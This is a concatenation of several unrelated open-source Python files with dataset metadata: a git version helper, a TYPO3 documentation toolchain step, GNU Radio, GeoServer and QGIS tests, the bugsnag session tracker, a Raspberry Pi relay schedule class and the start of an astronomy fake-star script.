#!/usr/bin/env python #----------------------------------------------------------------------------- # Copyright (c) 2013, The BiPy Development Team. # # Distributed under the terms of the Modified BSD License. # # The full license is in the file COPYING.txt, distributed with this software. #----------------------------------------------------------------------------- __credits__ = ["Daniel McDonald", "Jai Ram Rideout", "Yoshiki Vazquez Baeza"] import os import subprocess class Version(object): """Represent module version information This is inspired by Python's sys.version_info """ def __init__(self, package, major, minor, micro=None, releaselevel=None, init_file=None): if not isinstance(package, str): raise TypeError("Package must be a string") if not isinstance(major, int): raise TypeError("Major version must be an integer") if not isinstance(minor, int): raise TypeError("Minor version must be an integer") if micro is not None and not isinstance(micro, int): raise TypeError("Micro version must be an integer") if releaselevel is not None and not isinstance(releaselevel, str): raise TypeError("Releaselevel must be a string") if init_file is not None and not os.path.exists(init_file): raise ValueError("init_file must exist if provided") self.package = package self.major = major self.minor = minor self.micro = micro self.releaselevel = releaselevel self.init_file = init_file @property def mmm(self): """major.minor.micro version string""" if self.micro is None: return "%d.%d" % (self.major, self.minor) else: return "%d.%d.%d" % (self.major, self.minor, self.micro) def __str__(self): """Return a version string""" if self.micro is None: base = "%d.%d" % (self.major, self.minor) else: base = "%d.%d.%d" % (self.major, self.minor, self.micro) if self.releaselevel is not None: base = "%s-%s" % (base, self.releaselevel) git_branch = self.git_branch() git_sha1 = self.git_sha1() if git_branch is not None: return "%s, %s@%s" % (base, git_branch, git_sha1) else: return base def __repr__(self): """Return version information similar to Python's sys.version_info""" name = "%s_version" % self.package major = "major=%d" % self.major minor = "minor=%d" % self.minor items = [major, minor] if self.micro is not None: items.append("micro=%s" % self.micro) if self.releaselevel is not None: items.append("releaselevel='%s'" % self.releaselevel) git_branch = self.git_branch() git_sha1 = self.git_sha1(truncate=False) if git_branch is not None: git_branch = "git_branch='%s'" % git_branch git_sha1 = "git_sha1='%s'" % git_sha1 items.append(git_branch) items.append(git_sha1) return "%s(%s)" % (name, ', '.join(items)) def git_branch(self): """Get the current branch (if applicable) This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has given explicit permission for this code to be licensed under BSD. The discussion can be found here https://github.com/wasade/verman/issues/1 """ if self.init_file is None: return None pkg_dir = self.package_dir() branch_cmd = 'git --git-dir %s/.git rev-parse --abbrev-ref HEAD' %\ (pkg_dir) branch_o, branch_e, branch_r = self.verman_system_call(branch_cmd) git_branch = branch_o.strip() if self._is_valid_git_refname(git_branch): return git_branch else: return None def git_sha1(self, truncate=True): """Get the current git SHA1 (if applicable) This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza has given explicit permission for this code to be licensed under BSD. 
The discussion can be found here
        https://github.com/wasade/verman/issues/1
        """
        if self.init_file is None:
            return None

        pkg_dir = self.package_dir()
        sha_cmd = 'git --git-dir %s/.git rev-parse HEAD' % (pkg_dir)
        sha_o, sha_e, sha_r = self.verman_system_call(sha_cmd)

        git_sha = sha_o.strip()

        if self._is_valid_git_sha1(git_sha):
            if truncate:
                return git_sha[0:7]
            else:
                return git_sha
        else:
            return None

    def _is_valid_git_refname(self, refname):
        """check if a string is a valid branch-name/ref-name for git

        Input:
        refname: string to validate

        Output:
        True if 'refname' is a valid branch name in git. False if it fails to
        meet any of the criteria described in the man page for
        'git check-ref-format', also see:
        http://www.kernel.org/pub/software/scm/git/docs/git-check-ref-format.html

        This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza
        has given explicit permission for this code to be licensed under BSD.
        The discussion can be found here
        https://github.com/wasade/verman/issues/1
        """
        if len(refname) == 0:
            return False

        # git imposes a few requirements to accept a string as a
        # refname/branch-name

        # They can include slash / for hierarchical (directory) grouping, but no
        # slash-separated component can begin with a dot . or end with the
        # sequence .lock
        if (len([True for element in refname.split('/')
                 if element.startswith('.') or element.endswith('.lock')])
                != 0):
            return False

        # They cannot have two consecutive dots .. anywhere
        if '..' in refname:
            return False

        # They cannot have ASCII control characters (i.e. bytes whose values are
        # lower than \040, or \177 DEL), space, tilde, caret ^, or colon :
        # anywhere
        if len([True for refname_char in refname if ord(refname_char) < 0o40 or
                ord(refname_char) == 0o177]) != 0:
            return False
        if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:
            return False

        # They cannot have question-mark ?, asterisk *, or open bracket [
        # anywhere
        if '?' in refname or '*' in refname or '[' in refname:
            return False

        # They cannot begin or end with a slash / or contain multiple
        # consecutive slashes
        if refname.startswith('/') or refname.endswith('/') or '//' in refname:
            return False

        # They cannot end with a dot .
        if refname.endswith('.'):
            return False

        # They cannot contain a sequence @{
        if '@{' in refname:
            return False

        # They cannot contain a \
        if '\\' in refname:
            return False

        return True

    def _is_valid_git_sha1(self, possible_hash):
        """check if a string is a valid git sha1 string

        Input:
        possible_hash: string to validate

        Output:
        True if the string has 40 characters and is an hexadecimal number,
        False otherwise.

        This code was adapted from QIIME. The author, Yoshiki Vazquez Baeza
        has given explicit permission for this code to be licensed under BSD.
        The discussion can be found here
        https://github.com/wasade/verman/issues/1
        """
        if len(possible_hash) != 40:
            return False
        try:
            _ = int(possible_hash, 16)
        except ValueError:
            return False

        return True

    def package_dir(self):
        """Returns the top-level package directory

        This code was adapted from QIIME. The author, Greg Caporaso, has given
        explicit permission for this code to be licensed under BSD.
The discussion can be found here: https://github.com/wasade/verman/issues/1 """ # Get the full path of the module containing an instance of Version if self.init_file is None: return None current_file_path = os.path.abspath(self.init_file) # Get the directory current_dir_path = os.path.dirname(current_file_path) # Return the directory containing the directory containing the instance return os.path.dirname(current_dir_path) def verman_system_call(self, cmd): """Issue a system call This code is based off of pyqi's pyqi_system_call """ proc = subprocess.Popen(cmd, shell=True, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # communicate pulls all stdout/stderr from the PIPEs to # avoid blocking -- don't remove this line! stdout, stderr = proc.communicate() return_value = proc.returncode return stdout, stderr, return_value verman_version = Version("verman", 1, 1, 1, init_file=__file__) __version__ = verman_version.mmm
bsd-3-clause
-6,532,921,692,975,337,000
33.535316
93
0.583423
false
marble/Toolchain_RenderDocumentation
12-Get-ready-for-the-project/run_35-Define-general-values.py
1
8699
#!/usr/bin/env python # coding: utf-8 from __future__ import print_function from __future__ import absolute_import import os import sys import tct from tct import deepget ospj = os.path.join params = tct.readjson(sys.argv[1]) facts = tct.readjson(params['factsfile']) milestones = tct.readjson(params['milestonesfile']) reason = '' resultfile = params['resultfile'] result = tct.readjson(resultfile) toolname = params['toolname'] toolname_pure = params['toolname_pure'] toolchain_name = facts['toolchain_name'] workdir = params['workdir'] loglist = result['loglist'] = result.get('loglist', []) exitcode = CONTINUE = 0 # ================================================== # Make a copy of milestones for later inspection? # -------------------------------------------------- if 0 or milestones.get('debug_always_make_milestones_snapshot'): tct.make_snapshot_of_milestones(params['milestonesfile'], sys.argv[1]) # ================================================== # Helper functions # -------------------------------------------------- def firstNotNone(*args): for arg in args: if arg is not None: return arg else: return None def lookup(D, *keys, **kwdargs): result = deepget(D, *keys, **kwdargs) loglist.append((keys, result)) return result def findRunParameter(key, default=None, D=None): result = firstNotNone( deepget(milestones, key, default=None), deepget(facts, 'run_command', key, default=None), deepget(milestones, 'jobfile_data', 'tctconfig', key, default=None), deepget(facts, 'tctconfig', configset, key, default=None), default, None) # deliberate side effect if isinstance(D, dict): D[key] = result return result ATNM = all_the_new_milestones = {} # ================================================== # define # -------------------------------------------------- # buildsettings_builddir_root = /ALL/dummy_webroot buildsettings_builddir = '' checksum_ttl_seconds = 86400 * 7 # render if last checksum calculation is older gitdir_must_start_with = '/home/mbless/HTDOCS/:/home/marble/Repositories/:/tmp/' lockfile_ttl_seconds = 1800 relative_part_of_builddir = '' TheProjectCacheDir = None url_of_webroot = 'https://docs.typo3.org/' webroot_abspath = '/ALL/dummy_webroot' xeq_name_cnt = 0 email_user_do_not_send = 0 email_user_receivers_exlude_list = [ '[email protected]', '[email protected]', '[email protected]', '[email protected]', ] general_string_options = ( ('conf_py_masterfile', ''), ('email_admin', '[email protected]'), ('email_user_bcc', ''), ('email_user_cc', ''), ('email_user_to_instead', ''), ('oo_parser', 'dl'), # dl | flt ) general_int_options = ( ('email_admin_send_extra_mail', 0), ('email_user_do_not_send', 0), ('make_latex', 1), ('make_package', 1), ('make_pdf', 1), ('make_singlehtml', 1), ('rebuild_needed', 0), ('replace_static_in_html', 0), ) general_csvlist_options = ( ('email_user_receivers_exlude_list', ''), ) SYMLINK_THE_MAKEDIR = None SYMLINK_THE_OUTPUT = None SYMLINK_THE_PROJECT = None # ================================================== # Check params # -------------------------------------------------- if exitcode == CONTINUE: loglist.append('CHECK PARAMS') # relative_part_of_builddir = lookup(facts, 'tctconfig', configset, 'relative_part_of_builddir', default=relative_part_of_builddir) buildsettings_builddir = lookup(milestones, 'buildsettings', 'builddir', default=buildsettings_builddir) configset = lookup(milestones, 'configset') makedir_abspath = lookup(milestones, 'makedir_abspath') url_of_webroot = lookup(facts, 'tctconfig', 'configset', 'url_of_webroot', default=url_of_webroot) 
webroot_abspath = lookup(facts, 'tctconfig', 'configset', 'webroot_abspath', default=webroot_abspath) if not (1 and buildsettings_builddir and configset and makedir_abspath and url_of_webroot and webroot_abspath ): exitcode = 22 reason = 'Bad PARAMS or nothing to do' if exitcode == CONTINUE: loglist.append('PARAMS are ok') else: loglist.append('Bad PARAMS or nothing to do') # ================================================== # work # -------------------------------------------------- if exitcode == CONTINUE: resultdir = lookup(milestones, 'resultdir') if resultdir: TheProjectCacheDir = ospj(resultdir, 'Cache') if exitcode == CONTINUE: for option, default in general_int_options: v = findRunParameter(option, default) if v is not None: result['MILESTONES'].append({option: int(v)}) for option, default in general_string_options: v = findRunParameter(option, default) if v is not None: result['MILESTONES'].append({option: v}) for option, default in general_csvlist_options: v = findRunParameter(option, default) if v is not None: v = v.replace(' ', ',').split(',') v = [item for item in v if item] result['MILESTONES'].append({option: v}) if exitcode == CONTINUE: # Determine relative_part_of_builddir. # Example: typo3cms/Project/default/0.0.0 if not relative_part_of_builddir: if buildsettings_builddir.startswith(webroot_abspath): relative_part_of_builddir = buildsettings_builddir[len(webroot_abspath):] else: relative_part_of_builddir = buildsettings_builddir relative_part_of_builddir = relative_part_of_builddir.strip('/') SYMLINK_THE_MAKEDIR = ospj(makedir_abspath, 'SYMLINK_THE_MAKEDIR') SYMLINK_THE_OUTPUT = ospj(makedir_abspath, 'SYMLINK_THE_OUTPUT') SYMLINK_THE_PROJECT = ospj(makedir_abspath, 'SYMLINK_THE_PROJECT') # ================================================== # Set MILESTONE # -------------------------------------------------- if buildsettings_builddir: result['MILESTONES'].append({'buildsettings_builddir': buildsettings_builddir}) if checksum_ttl_seconds: result['MILESTONES'].append({'checksum_ttl_seconds': checksum_ttl_seconds}) if email_user_do_not_send: result['MILESTONES'].append({'email_user_do_not_send': email_user_do_not_send}) if email_user_receivers_exlude_list: result['MILESTONES'].append({'email_user_receivers_exlude_list': email_user_receivers_exlude_list}) if lockfile_ttl_seconds: result['MILESTONES'].append({'lockfile_ttl_seconds': lockfile_ttl_seconds}) if TheProjectCacheDir: result['MILESTONES'].append({'TheProjectCacheDir': TheProjectCacheDir}) if relative_part_of_builddir: result['MILESTONES'].append({'relative_part_of_builddir': relative_part_of_builddir}) if url_of_webroot: result['MILESTONES'].append({'url_of_webroot': url_of_webroot}) if webroot_abspath: result['MILESTONES'].append({'webroot_abspath': webroot_abspath}) if gitdir_must_start_with: result['MILESTONES'].append({'gitdir_must_start_with': gitdir_must_start_with}) if SYMLINK_THE_MAKEDIR: result['MILESTONES'].append({'SYMLINK_THE_MAKEDIR': SYMLINK_THE_MAKEDIR}) if SYMLINK_THE_OUTPUT: result['MILESTONES'].append({'SYMLINK_THE_OUTPUT': SYMLINK_THE_OUTPUT}) if SYMLINK_THE_PROJECT: result['MILESTONES'].append({'SYMLINK_THE_PROJECT': SYMLINK_THE_PROJECT}) # ================================================== # save result # -------------------------------------------------- tct.save_the_result(result, resultfile, params, facts, milestones, exitcode, CONTINUE, reason) # ================================================== # Return with proper exitcode # -------------------------------------------------- 
sys.exit(exitcode) """ [general] temp_home = /tmp toolchains_home = /ALL/Toolchains/ [default] buildsettings_builddir_root = /ALL/dummy_webroot webroot_part_of_builddir = /ALL/dummy_webroot webroot_abspath = /ALL/dummy_webroot htaccess_template_show_latest = /ALL/Makedir/_htaccess conf_py_masterfile = /ALL/Makedir/conf.py repositories_rootfolder = /tmp/T3REPOS extensions_rootfolder = /tmp/T3EXTENSIONS extensions_builddir_relpath = typo3cms/extensions drafts_builddir_relpath = typo3cms/drafts # override these on the commandline force_rebuild_needed = 1 make_latex = 0 make_package = 0 make_pdf = 0 make_singlehtml = 0 rebuild_needed = 1 replace_static_in_html = 0 talk = 1 # others email_admin = email_user_cc = email_user_bcc = lockfile_name = lockfile.json url_of_webroot = https://docs.typo3.org/ latex_contrib_typo3_folder = /ALL/Downloads/latex.typo3 email_user_send_to_admin_too = 0 email_user_to = email_user_do_not_send = 0 email_user_receivers_exlude_list = , smtp_host= """
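
# Invocation sketch (hypothetical path): the toolchain runner executes this
# step with a single JSON params file argument,
#
#   python run_35-Define-general-values.py /tmp/params.json
#
# where the params JSON supplies the 'factsfile', 'milestonesfile' and
# 'resultfile' paths read at the top of this script.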
mit
4,967,890,019,327,124,000
29.208333
135
0.62237
false
trnewman/VT-USRP-daughterboard-drivers_python
gr-usrp/src/qa_usrp.py
1
1235
#!/usr/bin/env python # # Copyright 2005 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # from gnuradio import gr, gr_unittest import usrp1 class qa_usrp (gr_unittest.TestCase): def setUp (self): self.fg = gr.flow_graph () def tearDown (self): self.fg = None def test_000_nop (self): """Just see if we can import the module... They may not have a USRP connected, etc. Don't try to run anything""" pass if __name__ == '__main__': gr_unittest.main ()
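
# Usage sketch: like other GNU Radio QA modules this runs standalone via the
# gr_unittest.main() hook above; no USRP hardware is required:
#
#   python qa_usrp.py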
gpl-3.0
-927,789,237,548,357,000
29.875
78
0.692308
false
CCSS-CZ/layman
server/tests/layedtest.py
1
3969
import os,sys import unittest import ConfigParser TEST_DIR = os.path.dirname(os.path.abspath(__file__)) INSTALL_DIR = os.path.abspath(os.path.join(TEST_DIR,"..")) sys.path.append(os.path.join(INSTALL_DIR)) import json from layman.layed import LayEd from layman.layed import GsRest class LayEdTestCase(unittest.TestCase): """Test of the auth module""" le = None # LayEd workdir = None cfg = None def setUp(self): cfg = ConfigParser.SafeConfigParser() cfg.read((os.path.join(TEST_DIR,"tests.cfg"))) cfg.set("FileMan","testdir",TEST_DIR) self.le = LayEd(cfg) self.gsr = GsRest(cfg) self.config = cfg self.workdir = os.path.abspath(os.path.join(TEST_DIR,"workdir","data")) # TODO: add tests for POST /layed?myLayer def test_01_publish(self): # ff = "world_cities_point.shp" # file # ll = "world_cities_point" # layer # st = "world_cities_point" # style # ff = "pest.shp" # file # ll = "pest" # layer # st = "pest" # style ff = "line_crs.shp" # file ll = "line_crs" # layer st = "line_crs" # style ws = "mis" # workspace ds = "testschema" # datastore sch = "testschema" # schema # Check # # Check if the layer is not already there (head, cont) = self.gsr.getLayer(ws, ll) self.assertNotEquals("200", head["status"], "The layer already exists. Please, remove it manually." ) # Check if the style is not already there (head, cont) = self.gsr.getStyle(ws, st) self.assertNotEquals("200", head["status"], "The style already exists. Please, remove it manually." ) # Publish # self.le.publish(fsUserDir=self.workdir, fsGroupDir="", dbSchema=ds, gsWorkspace=ws, fileName=ff) # Test # # Check if the layer is there (head, cont) = self.gsr.getLayer(ws, ll) self.assertEquals("200", head["status"], "The layer is not there. Was it created under another name?") # Check the style of the layer layerJson = json.loads(cont) styleName = layerJson["layer"]["defaultStyle"]["name"] self.assertEquals(st, styleName, "The layer is there, but it has wrong style assinged.") # Check if the style is there (head, cont) = self.gsr.getStyle(ws, st) self.assertEquals("200", head["status"], "The style is not there." ) #def test_02_delete(self): # Checks # # Check that the layer is there #(head, cont) = self.gsr.getLayer("dragouni", "line_crs") #self.assertEquals("200", head["status"], "The layer line_crs is not there. Was it created under another name?") # Check that the style is there #(head, cont) = self.gsr.getStyle("dragouni", "line_crs") #self.assertEquals("200", head["status"], "The style line_crs is not there." ) # Delete # # Delete layer (including feature type, style and datastore) #self.le.deleteLayer(workspace="dragouni", layer="line_crs", deleteStore=True) # Test # # Check that the layer is not there #(head, cont) = self.gsr.getLayer("dragouni", "line_crs") #self.assertNotEquals("200", head["status"], "The layer line_crs still exists, should be already deleted." ) # Check that the style is not there #(head, cont) = self.gsr.getStyle("dragouni", "line_crs") #self.assertNotEquals("200", head["status"], "The style line_crs already exists, should be already deleted." ) # Check that the data store is not there #(head, cont) = self.gsr.getDataStore("dragouni", "line_crs") #self.assertNotEquals("200", head["status"], "The data store line_crs already exists, should be already deleted." ) if __name__ == "__main__": suite = unittest.TestLoader().loadTestsFromTestCase(LayEdTestCase) unittest.TextTestRunner(verbosity=2).run(suite)
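
# Prerequisites sketch: these tests talk to a live GeoServer via its REST API
# using the credentials in tests.cfg; with that in place they run standalone:
#
#   python layedtest.py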
gpl-3.0
-507,578,213,640,657,300
35.75
123
0.615772
false
NuttamonW/Archaeological
ElectricalConductivity/test/test_electrical_conductivity_dialog.py
1
1580
# coding=utf-8 """Dialog test. .. note:: This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. """ __author__ = '[email protected]' __date__ = '2015-08-04' __copyright__ = 'Copyright 2015, Point & June' import unittest from PyQt4.QtGui import QDialogButtonBox, QDialog from electrical_conductivity_dialog import ElectricalConductivityDialog from utilities import get_qgis_app QGIS_APP = get_qgis_app() class ElectricalConductivityDialogTest(unittest.TestCase): """Test dialog works.""" def setUp(self): """Runs before each test.""" self.dialog = ElectricalConductivityDialog(None) def tearDown(self): """Runs after each test.""" self.dialog = None def test_dialog_ok(self): """Test we can click OK.""" button = self.dialog.button_box.button(QDialogButtonBox.Ok) button.click() result = self.dialog.result() self.assertEqual(result, QDialog.Accepted) def test_dialog_cancel(self): """Test we can click cancel.""" button = self.dialog.button_box.button(QDialogButtonBox.Cancel) button.click() result = self.dialog.result() self.assertEqual(result, QDialog.Rejected) if __name__ == "__main__": suite = unittest.makeSuite(ElectricalConductivityDialogTest) runner = unittest.TextTestRunner(verbosity=2) runner.run(suite)
gpl-3.0
3,035,364,062,915,412,000
27.727273
78
0.677848
false
bugsnag/bugsnag-python
bugsnag/sessiontracker.py
1
4934
from copy import deepcopy
from uuid import uuid4
from time import strftime, gmtime
from threading import Lock, Timer
from typing import List, Dict, Callable
import atexit

try:
    from contextvars import ContextVar
    _session_info = ContextVar('bugsnag-session', default={})  # type: ignore
except ImportError:
    from bugsnag.utils import ThreadContextVar  # flake8: noqa
    _session_info = ThreadContextVar('bugsnag-session', default={})  # type: ignore

from bugsnag.utils import package_version, FilterDict, SanitizingJSONEncoder
from bugsnag.event import Event


__all__ = []  # type: List[str]


class SessionTracker:

    MAXIMUM_SESSION_COUNT = 100
    SESSION_PAYLOAD_VERSION = "1.0"

    """
    Session tracking class for Bugsnag
    """

    def __init__(self, configuration):
        self.session_counts = {}  # type: Dict[str, int]
        self.config = configuration
        self.mutex = Lock()
        self.auto_sessions = False
        self.delivery_thread = None

    def start_session(self):
        if not self.auto_sessions and self.config.auto_capture_sessions:
            self.auto_sessions = True
            self.__start_delivery()

        start_time = strftime('%Y-%m-%dT%H:%M:00', gmtime())
        new_session = {
            'id': uuid4().hex,
            'startedAt': start_time,
            'events': {
                'handled': 0,
                'unhandled': 0
            }
        }
        _session_info.set(new_session)
        self.__queue_session(start_time)

    def send_sessions(self):
        self.mutex.acquire()
        try:
            sessions = []
            for min_time, count in self.session_counts.items():
                sessions.append({
                    'startedAt': min_time,
                    'sessionsStarted': count
                })
            self.session_counts = {}
        finally:
            self.mutex.release()
        self.__deliver(sessions)

    def __start_delivery(self):
        if self.delivery_thread is None:
            def deliver():
                self.send_sessions()
                self.delivery_thread = Timer(30.0, deliver)
                self.delivery_thread.daemon = True
                self.delivery_thread.start()

            self.delivery_thread = Timer(30.0, deliver)
            self.delivery_thread.daemon = True
            self.delivery_thread.start()

            def cleanup():
                if self.delivery_thread is not None:
                    self.delivery_thread.cancel()
                self.send_sessions()

            atexit.register(cleanup)

    def __queue_session(self, start_time: str):
        self.mutex.acquire()
        try:
            if start_time not in self.session_counts:
                self.session_counts[start_time] = 0
            self.session_counts[start_time] += 1
        finally:
            self.mutex.release()

    def __deliver(self, sessions: List[Dict]):
        if not sessions:
            self.config.logger.debug("No sessions to deliver")
            return

        if not self.config.api_key:
            self.config.logger.debug(
                "Not delivering due to an invalid api_key"
            )
            return

        if not self.config.should_notify():
            self.config.logger.debug("Not delivering due to release_stages")
            return

        notifier_version = package_version('bugsnag') or 'unknown'

        payload = {
            'notifier': {
                'name': Event.NOTIFIER_NAME,
                'url': Event.NOTIFIER_URL,
                'version': notifier_version
            },
            'device': FilterDict({
                'hostname': self.config.hostname,
                'runtimeVersions': self.config.runtime_versions
            }),
            'app': {
                'releaseStage': self.config.release_stage,
                'version': self.config.app_version
            },
            'sessionCounts': sessions
        }

        try:
            encoder = SanitizingJSONEncoder(
                self.config.logger,
                separators=(',', ':'),
                keyword_filters=self.config.params_filters
            )
            encoded_payload = encoder.encode(payload)
            self.config.delivery.deliver_sessions(self.config, encoded_payload)
        except Exception as e:
            self.config.logger.exception('Sending sessions failed %s', e)


class SessionMiddleware:
    """
    Session middleware ensures that a session is appended to the event.
    """

    def __init__(self, bugsnag: Callable[[Event], Callable]):
        self.bugsnag = bugsnag

    def __call__(self, event: Event):
        session = _session_info.get()
        if session:
            if event.unhandled:
                session['events']['unhandled'] += 1
            else:
                session['events']['handled'] += 1
            event.session = deepcopy(session)
        self.bugsnag(event)
mit
8,336,604,068,259,510,000
30.031447
83
0.551074
false
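To see what SessionMiddleware does to an event, the counting logic can be exercised in isolation. A sketch with stand-in objects; FakeEvent and the inline session dict are assumptions made here so the snippet runs without the bugsnag package:

from copy import deepcopy


class FakeEvent:
    """Hypothetical stand-in for bugsnag.event.Event."""
    def __init__(self, unhandled):
        self.unhandled = unhandled
        self.session = None


session = {'id': 'abc123', 'events': {'handled': 0, 'unhandled': 0}}
delivered = []


def middleware(event):
    # Mirrors SessionMiddleware.__call__: bump the counter, snapshot the session.
    if event.unhandled:
        session['events']['unhandled'] += 1
    else:
        session['events']['handled'] += 1
    event.session = deepcopy(session)
    delivered.append(event)


middleware(FakeEvent(unhandled=False))
middleware(FakeEvent(unhandled=True))
print(delivered[0].session['events'])  # {'handled': 1, 'unhandled': 0}
print(delivered[1].session['events'])  # {'handled': 1, 'unhandled': 1}

The deepcopy matters: each event carries the counts as they stood at delivery time, not a live reference that later events would mutate.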
BirchJD/RPiTimer
PiTimer_Step-4/Schedule.py
1
5941
# PiTimer - Python Hardware Programming Education Project For Raspberry Pi
# Copyright (C) 2015 Jason Birch
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.

#/****************************************************************************/
#/* PiTimer - Step 4 - Schedule functions.                                   */
#/* ------------------------------------------------------------------------ */
#/* V1.00 - 2015-07-04 - Jason Birch                                         */
#/* ------------------------------------------------------------------------ */
#/* Class to handle scheduling events for specific relays. Such as adding,   */
#/* removing, displaying, sorting.                                           */
#/****************************************************************************/

import datetime
import ScheduleItem


#/****************************************************************************/
#/* Function to return the schedule date of a schedule item for when sorting */
#/* the items using the Python list sort feature.                            */
#/****************************************************************************/
def SortGetKey(Object):
    return Object.GetScheduleDate()


class Schedule:
    def __init__(self):
        # Define an array to store the schedule items in.
        self.ScheduleItems = []

    #/*********************************************/
    #/* Get the item at the specific array index. */
    #/*********************************************/
    def GetItem(self, ItemIndex):
        if len(self.ScheduleItems) > ItemIndex:
            return self.ScheduleItems[ItemIndex]
        else:
            return False

    #/*************************************************/
    #/* Find the schedule item with the specified ID. */
    #/*************************************************/
    def FindItem(self, FindItemID):
        ThisItem = False
        for ThisScheduleItem in self.ScheduleItems:
            if ThisScheduleItem.GetItemID() == FindItemID:
                ThisItem = ThisScheduleItem
        return ThisItem

    #/*******************************************************/
    #/* Function to display the current schedule of events. */
    #/* In a tabulated form.                                 */
    #/*******************************************************/
    def DisplaySchedule(self, SelectedItemID):
        if len(self.ScheduleItems):
            self.ScheduleItems[0].DisplayHeader()
        for ThisScheduleItem in self.ScheduleItems:
            if SelectedItemID == ThisScheduleItem.GetItemID():
                SelectLeftChar = ">"
                SelectRightChar = "<"
            else:
                SelectLeftChar = " "
                SelectRightChar = " "
            ThisScheduleItem.DisplayItem(SelectLeftChar, SelectRightChar)
        if len(self.ScheduleItems):
            self.ScheduleItems[0].DisplayFooter()

    #/**************************************************/
    #/* Add a new schedule item to the schedule array. */
    #/**************************************************/
    def AddSchedule(self, NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat):
        self.ScheduleItems.append(ScheduleItem.ScheduleItem(NewRelayNumber, NewScheduleDate, NewRelayState, NewRepeat))
        self.SortSchedule()

    #/*****************************************************/
    #/* Delete a schedule item from the schedule array.   */
    #/*****************************************************/
    def DelSchedule(self, ItemID):
        ThisScheduleItem = self.FindItem(ItemID)
        if ThisScheduleItem:
            self.ScheduleItems.remove(ThisScheduleItem)
        self.SortSchedule()

    #/*********************************************/
    #/* Sort the list of schedule items so the    */
    #/* expired items are at the top of the list. */
    #/*********************************************/
    def SortSchedule(self):
        self.ScheduleItems.sort(key=SortGetKey)

    #/*************************************************************************/
    #/* If the top schedule item is in the past return its ID as being        */
    #/* triggered. The schedule items are kept in date order, so the top item */
    #/* is the one which will trigger first. The calling function is          */
    #/* responsible for removing the triggered item from the scheduled items  */
    #/* or updating the scheduled item if the item is to be repeated once     */
    #/* the calling function has processed it; by calling the function:       */
    #/* SetNextScheduleDate().                                                */
    #/*************************************************************************/
    def ScheduleTrigger(self):
        ThisItemID = False
        Now = datetime.datetime.now()
        ThisItem = self.GetItem(0)
        if ThisItem and ThisItem.GetScheduleDate() <= Now:
            ThisItemID = ThisItem.GetItemID()
        return ThisItemID

    #/*********************************************************************/
    #/* Set the date and time of the specified schedule item to its next  */
    #/* trigger date/time. If the item does not have a repeat period,     */
    #/* remove the schedule item.                                         */
    #/*********************************************************************/
    def SetNextScheduleDate(self, ThisItemID):
        ThisItem = self.FindItem(ThisItemID)
        if ThisItem and ThisItem.SetNextScheduleDate() == False:
            self.DelSchedule(ThisItemID)
        self.SortSchedule()
gpl-3.0
-9,058,749,069,529,155,000
40.838028
117
0.497391
false
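The trigger logic only ever inspects the head of the date-sorted list. A sketch of that invariant with a hypothetical minimal item class; StubItem is an assumption, since the real ScheduleItem.ScheduleItem (not shown in this record) also carries relay number, state and repeat period:

import datetime


class StubItem:
    """Hypothetical minimal stand-in for ScheduleItem.ScheduleItem."""
    def __init__(self, item_id, when):
        self._id = item_id
        self._when = when

    def GetItemID(self):
        return self._id

    def GetScheduleDate(self):
        return self._when


items = [StubItem(1, datetime.datetime(2015, 7, 4, 12, 0)),
         StubItem(2, datetime.datetime(2015, 7, 4, 8, 0))]
items.sort(key=lambda obj: obj.GetScheduleDate())  # same key as SortGetKey()

# ScheduleTrigger() in miniature: only the earliest item can fire.
if items and items[0].GetScheduleDate() <= datetime.datetime.now():
    print("Item %d is due" % items[0].GetItemID())  # prints: Item 2 is due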
dweisz/pydolphot
make_fakerun.py
1
2967
import numpy as np
import sys
import subprocess
import os

'''
def makephotfiles(base, nstart, nruns, nimages):
    for i in range(nstart,nstart+nruns):
        for j in range(1, nimages+1):
            subprocess.call("ln -s "+base+"."+np.str(j)+".res.fits " + base+"_"+np.str(i)+"."+np.str(j)+".res.fits", shell=True)
            subprocess.call("ln -s "+base+"."+np.str(j)+".psf.fits " + base+"_"+np.str(i)+"."+np.str(j)+".psf.fits", shell=True)
        subprocess.call("ln -s "+base+".info " + base+"_"+np.str(i)+".info", shell=True)
        subprocess.call("ln -s "+base+".apcor " + base+"_"+np.str(i)+".apcor", shell=True)
        subprocess.call("ln -s "+base+".psfs " + base+"_"+np.str(i)+".psfs", shell=True)
        subprocess.call("ln -s "+base+".columns " + base+"_"+np.str(i)+".columns", shell=True)
        subprocess.call("ln -s "+base + " " + base+"_"+np.str(i), shell=True)
'''


def makefakelist(photfile, filter1, filter2, fmin, fmax, cmin, cmax, nruns, nstars=15000, nstart=1):
    for i in range(nstart, nstart+nruns):
        subprocess.call('fakelist ' + np.str(photfile) + ' ' + np.str(filter1) + ' ' + np.str(filter2) +
                        ' ' + np.str(fmin) + ' ' + np.str(fmax) + ' ' + np.str(cmin) + ' ' + np.str(cmax) +
                        ' ' + "-nstar=" + np.str(nstars) + "> fake.list_" + np.str(i), shell=True)
        subprocess.call('sleep 5', shell=True)


def makefakeparam(param_file, base, nruns, nstart=1):
    infile = param_file
    for i in range(nstart, nstart+nruns):
        fakeparam = "phot.fake_"+np.str(i)+".param"
        subprocess.call("cp "+infile+" "+fakeparam, shell=True)
        outfile = fakeparam
